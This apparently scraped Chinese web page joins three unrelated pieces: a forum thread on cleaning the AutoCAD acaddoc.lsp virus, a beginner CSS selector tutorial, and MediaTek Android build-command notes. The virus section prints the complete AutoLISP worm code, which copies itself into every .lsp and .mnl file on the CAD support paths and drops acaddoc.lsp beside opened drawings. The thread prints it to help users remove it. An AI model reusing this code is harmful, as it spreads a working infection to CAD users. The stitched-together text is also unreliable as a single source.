方法 一
acaddoc.lsp输入的列表有缺陷(转自LOVE空间)2009年04月07日 星期二 上午 11:14这个是个新病毒,用以往的解决方法(1.lps改名为acaddoc.lsp替换)无法解决,在网络搜索了一下看到百度空间有个帖子有相关解决办法。
原帖如下:
今天在Q群里又见网友请求删除CAD病毒,说用专杀工具也无法解决,于是让他把病毒文件传了给我。
打开文件一看,发现这个“acaddoc.lsp”文件内的程序代码跟以往的“acaddoc.lsp”病毒文件不同。
该病毒文件自动搜索CAD支持路径下的所有“*.mnl”文件和“*.lsp”文件。将病毒代码(“acaddoc.lsp”文件内容)写入“*.lsp”文件内,并在“*.mnl”文件中写入“*.lsp”文件的加载路径。同时,直线命令“line”、外部参照管理命令“xref”和分解(炸开)命令“explode”无法使用。
CAD系统感染该病毒文件后,只是简单搜索删除“acaddoc.lsp”文件,不能清除病毒。因为所有的“*.lsp”文件已经被修改,所有“*.lsp”文件都是病毒文件。
解决方法壹:
①、关闭CAD
②、搜索并删除所有“acaddoc.lsp”文件
③、卸载CAD(必须卸载干净,并进入C盘用户目录内删除没有卸载完的CAD文件)后,重新安装CAD
解决方法贰:
①、关闭CAD
②、搜索并删除所有“acaddoc.lsp”文件
③、找一台没有被CAD病毒破坏、且安装有相同版本CAD的电脑,复制其所有“*.lsp”文件和“*.mnl”文件至本机覆盖原文件(包括C盘用户目录内的相关文件)
预防CAD病毒:
装好CAD系统后,在没有被病毒感染前,将CAD目录内所有文件的属性设置为只读,可以减少中毒的机率。(此法99.999%有效)
附:C:\Documents and Settings\×××\Application Data\Autodesk\AutoCAD 200×\R×.×\
其中×××是你登录系统时的用户名, 200×和R×.×分别是CAD的版本和版本代号。(注意:目录C:\Documents and Settings\是系统隐藏文件夹)
转帖地址:http://hi.baidu.com/liuhuibin1984/blog/item/fbe647233340a543ad34deb3.html
方法 二
CAD开机运行时会有一大串函数,并且产生acaddoc.lsp的文件处理方法,我用了,方法很好就转过来了
以下是本人中了acaddoc.lsp病毒的后亲身体验的杀毒经历。
开始也在网上找了很多所谓的CAD病毒专杀、acaddoc.lsp专杀什么的软件。。。全试了都没有用。后来通过网上介绍的一些关于lsp病毒的特性,亲身试验后确实有效,在此和大家分享,希望能为大家解决一些问题。
下面言归正传,杀毒步骤如下:
1、全盘删除acaddoc.lsp(包括隐藏文件夹)——————废话了,呵呵
2、删除C:\Documents and Settings\Administrator\Application Data\Autodesk\AutoCAD 2006\R16.2\chs\Support下面的acaddoc.lsp和acadapq.lsp
3、删除C:\Documents and Settings\Administrator\Application。Data\Autodesk\AutoCAD 2006\R16.2\chs\Support下面的acad.mnl、acetmain.mnl和AecArchXOE.mnl。
4、删除C:\Program Files\AutoCAD 2006\Support下面所有的*****.lsp,本人用的2006版共10个****.lsp文件。
5、COPY下面附件的alsp内的两个文件到C:\Documents and Settings\Administrator\Application Data\Autodesk\AutoCAD 2006\R16.2\chs\Support,改为只读。
6、COPY下面附件的mnl内的三个文件到C:\Documents and Settings\Administrator\Application Data\Autodesk\AutoCAD 2006\R16.2\chs\Support,改为只读。
7、COPY下面附件的LSP内的十个文件到C:\Program Files\AutoCAD 2006\Support,改为只读。
经以上步骤处理后,就完全可以放心使用了。
方法 三
CAD的病毒很多但都大同小异。现就出现的ACADDOC.LSP病毒进行杀毒。不用重新安装CAD的办法。
1、发现文件夹中多出ACADDOC.LSP说明你中毒了。
2、关闭CAD程序。
3、全盘查找 *.fas *.lsp *.mnl *.arx文件,除了CAD安装目录以外的全部删除。
4、检查CAD安装目录文件的修改时间,把最近的几个文件中的病毒代码删除。(用记事本打开)
5、把CAD安装目录中的所有*.fas *.lsp *.mnl *.arx文件改为只读属性。
说明:
1、ACADDOC.LSP病毒感染X:\Program Files\AutoCAD 20**\Support文件夹下的3d.lsp;3darray.lsp;acad2010.lsp;acad2010doc.lsp;acadinfo.lsp;ai_utils.lsp;attredef.lsp;edge.lsp;mvsetup.lsp;sample-profile-util.lsp文件。
2、要删除的病毒代码在文件的尾部,具体如下:
(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(progn
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
)while
(close wjm1)
)progn
)if
(if flag1
(progn
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(progn
(write-line text wjm1)
)progn
)if
)while
(close wjm1)
(close wjm)
)progn
)if
)defun
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(progn
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (<mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
)while
(setq lspn 0)
(while (<lspn lspnum)
(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
)while
)progn
)if
(setq mnln 0)
(while (<mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (<mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
)while
(setq lspn1 0)
(while (<lspn1 lspnum)
(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
)while
(setq mnln (1+ mnln))
)while
(setq lspn 0)
(while (<lspn lspnum)
(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (<lspn1 lspnum)
(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
)while
(setq mnln1 0)
(while (<mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
(app lspfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
)while
(setq lspn (1+ lspn))
(load "acadapq")
(princ)
加入360督导委员会 参与全民护安全! 论坛版主扩编,欢迎您的加入!
canesky
金币:65
经验:99
等级:学前班
功勋:无
短信
[回复此楼][引用][举报] 2 楼 2010-06-11 09:27 顶!
寒梅雪松
金币:15
经验:51
等级:幼儿园
功勋:无
短信
[回复此楼][引用][举报] 3 楼 2010-11-10 03:14 这个方法不管用
aimou108
金币:15
经验:55
等级:幼儿园
功勋:无
短信
[回复此楼][引用][举报] 4 楼 2010-12-07 10:59 已解决!感谢360论坛!同时感谢qq!如果不是qq当年作出一个艰难的决定,我不会用上360.,也就不会知道360论坛。
楼主给我们提供了一个解决方案,但需要注意的是,病毒感染的并不仅仅是安装目录下的文件。如果仅仅清除安装目录下感染文件的代码,是无效的。这也是很多朋友说这个方法不管用的原因。它同时感染了
C:\Documents and Settings\用户名\Application Data\Autodesk\AutoCAD 2006\R16.2\chs\Support下的*.MNL文件。需要一并将上述代码清除。
这个问题折腾了我几个月,奶奶的。无毒一身轻啊。。。
CSS是由选择器加声明组成的。比如:
h1{color:red}
h1就是选择器,意思是只要遇到h1,就使用该CSS的规则
color:red:这个事声明
color:这个是属性
red:这个是值
2
OK,我们先来分析选择器。
END
一.选择器
1
选择器的种类很多,各有各的作用。我们来一一讲解。
标签选择器
class选择器
id选择器
全局选择器
组合选择器
伪类选择器
2
标签选择器
顾名思义,HTML中有许多标签,而标签选择器就是用来给标签直接申明样式的,简单、实用、常用。
举例:
p{color:red}
只要是p标签,其P标签内部的颜色,都是红色。
如图代码
<head><meta http-equiv="Content-Type" content="text/htmlcharset=utf-8" /><title>无标题文档</title><style>p{ color:red}</style></head><body><p>嘿嘿哦嘿嘿呀哦嘿嘿哦</p></body>
其中,<style>标签是样式标签,请将CSS放在其中
(这部分内容后续会介绍,这里只是先提一下)
3
看网页效果
4
class选择器
也叫做类选择器,直接说概念估计你也不明白,直接上例子吧。
举例:
.alsp{color:red}
这就是一个class选择器,意思是有一种CSS的样式,其名字是alsp,谁想用谁用。
看代码:
<head><meta http-equiv="Content-Type" content="text/htmlcharset=utf-8" /><title>无标题文档</title><style type="text/css">.alsp{color:red}</style></head><body><p class="alsp">嘿嘿哦嘿嘿呀哦嘿嘿哦</p><ol class="alsp"><li>嘿啥嘿</li><li>我想嘿嘿</li><li>专制各种不服</li></ol><p>世界为亡,死不投降</p></body>
5
看网页效果
通过.alsp定义一个class选择器。
在后面的代码中,哪个标签想用,就用class="alsp"去调用,就可以使用这件“衣服”来修饰自己了
6
ID选择器
ID和class很像,但是和class有一个区别。class像姓名,两个人是可以同名的,但是id像身份z,只有一个人可以使用。
例如:
#alsp{color:red}
OK,上代码:
#alsp{color:red}</style></head><body><p id="alsp">嘿嘿哦嘿嘿呀哦嘿嘿哦</p><ol><li>嘿啥嘿</li><li>我想嘿嘿</li><li>专制各种不服</li></ol><p>世界为亡,死不投降</p></body>
7
看网页效果
只能有一个标签使用该id,或者说该标签专属ID
8
全局选择器
*{margin:0padding:0}
这个很简单,前面用个*来表示,整个网页都会使用。这句话也是网页基本都要添加的,什么意思呢?自己试试看吧。
9
组合选择器
组合选择,小编是非常喜欢使用的,原因无他,懒而已。他可以减少代码量,并且方便、易读。
不过组合选择器的组合方式比较多,但也多很好理解。
1)群模式
比如:
h1{color:redfont-size:14px}
p{color:redfont-size:14px}
a{color:redfont-size:14px}
这三个虽然标签不同,但是样式是一模一样的,所以,可以这样写:
h1,p,a,{color:redfont-size:14px}
2)继承模式
比如:
.alsp li{color:red}
<ul class=".alsp">
<li>fdf</li>
</ul>
li是在ul之中的,算是ul的后代。通过.alsp li确定li是属于调用alsp类选择器里的li标签,其他的li标签并不会使用该样式。
3)群模式(多元素并列选择器)
其实也是一种特殊的群模式
p.alsp{color:red}
<p class="alsp">p.alsp</p>
<a class="alsp">a.alsp</p>
alsp仍然是一种class选择器,但是他只有在p的标签下被使用才生效。
所以,第一行生效,p.alsp字样变红,第二行不生效
10
伪类选择器
“伪”字暴露了他的本质,伪类选择器并不像其他选择器直接做用在标签上,但是他偏偏又是在标签上进行使用,所以称为“伪类选择器”。
伪类的作用,是作用在状态上。
一般情况正常运行,只有当达成条件的时候触发,才会执行伪类选择器所代表是css样式。
伪类选择器很多,但许多都是我们这辈子估计都用不到的。
OK,伪类选择器后续我会专门写一篇经验介绍,有点小多,这里也就不多说了。
END
二.在HTML中调用CSS
调用CSS的常用方法有3中
内样式
外样式
行间样式
内样式
直接看代码,如图所示
在<head></head>中,加入<style></style>,并将相关的CSS样式放在其中
外样式
直接看代码,如图所示:
<link rel="stylesheet" type="text/css" href="index.css">
这里,href为css的路径。
意思是,你专门创建一个index.css的文件,里面放上CSS样式,和内样式的语法一模一样,只是专门找了一个文件存放而已。
行间样式
行间样式直接写在元素里面
例如:<p style="color:#900">嘿嘿哦嘿嘿呀哦嘿嘿哦</p>
直接在标签后面加上style
一般不要用,不过可以用来调试使用
END
总结
到这里,这篇经验就算完结了。你也应该知道如何去写CSS样式,如何在HTML里添加CSS样式了。
后面我会继续写CSS的声明部分。
1: ./mk n(r) kernel./mk bootimage当修改build-in 到kernel相关代码时,要使用此命令,具体文件参考如下:alps/kernel/
alps/mediatek/platform/mt65xx/kernel/
alps/mediatek/source/kernel/
alps/mediatek/coustom/mt65xx/kernel/
alps/mediatek/coustom/common/kernel/
alps/mediatek/coustom/$porject_name$/kernel
...
ps: 由于./mk bootimag是很长的过程, 如果您没有修改到ramdisk相关的code, 可以参考以下FAQ加快编译.
只修改kernel的时候, 快速编译方法: FAQ05444
2: ./mk n(r) k /module_path 当修改kernel module相关代码时,要使用此命令,具体文件参考如下:
alps/mediatek/platform/mt65xx/kernel/drivers/ccci/
alsp/mediatek/platform/mt65xx/gpu/
......
通常看对应文件夹的Makefile就知道是build in到kernel,还是ko,
obj-m += xxx, 表示build成ko module,
obj-y += xxx, 表示build in到bootimag.
ps: 要特别注意, 如果你new的时候是user版本, 在使用此命令的时候一定要加上
-oTARGET_BUILD_VARIANT=user, 否则会导致将之前new的结果全部删除,
3: ./mk n pl 当修改preloader相关代码时,要使用此命令,具体如下:
alps/mediatek/platform/mt65xx/preloader/
alps/mediatek/source/preloader/
alps/mediatek/coustom/mt65xx/preloader/
alps/mediatek/coustom/common/preloader/
alps/mediatek/coustom/$porject_name$/kernle
......
4: ./mk uboot 当修改uboot相关代码时,要使用此命令,具体如下:
alps/mediatek/platform/mt65xx/uboot/
alps/mediatek/source/uboot/
alps/bootable/bootloader/uboot/
alps/mediatek/coustom/mt65xx/uboot/
alps/mediatek/coustom/common/buoot/
alps/mediatek/coustom/$porject_name$/uboot/
......
5: ./mk systemimage 当修改system相关代码时使用此命令,具体文件目录如下:
alps/frameworks/
alps/packages/
alps/vendor/
alps/hardware/
alps/dalvik/
alsp/external
...........
new完一次后, 如果使用这个命令其实很耗时间, 建议参考6的做法,
6: ./mk mm ./module_path 主要build一些modules, 如lib库, native 可执行程序, jar库, jar
apk. 相关文件参考如下:
alps/frameworks/base #可以根据修改的某些文件, 进入更细的目录去build相关库.
alps/frameworks/native/libs/binder/ #native目录下有很多相关的lib库.
alps/frameworks/native/libs/binder/utils/
alps/external#主要是一些native的二进制可执行文件.
ps: build完后可以找到对应的目标文件直接push到手机, 也可以使用./mk snod直接快速打包新的system.img, 然后download. 可参考如下FAQ:
如何加速./mk snod打包: FAQ10299
7: ./mk recoverimage 当修改recover相关代码时使用此命令,具体如下:
alps/bootable/recovery/
alps/mediatek/customer/$project_name$/recovery/
......
8: ./mk factoryimage: 当修改factory相关代码时使用此命令,具体如下:
alps/mediatek/coustom/$project_name$/factory/
alps/mediatek/coustom/common/factory/
alps/mediatek/source/factory/
......
9: ./mk secroimage 当修改secro相关代码时使用此命令,具体如下:
alps/mediatek/source/secro/
alps/mediatek/coustom/$project_name$/secro/
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)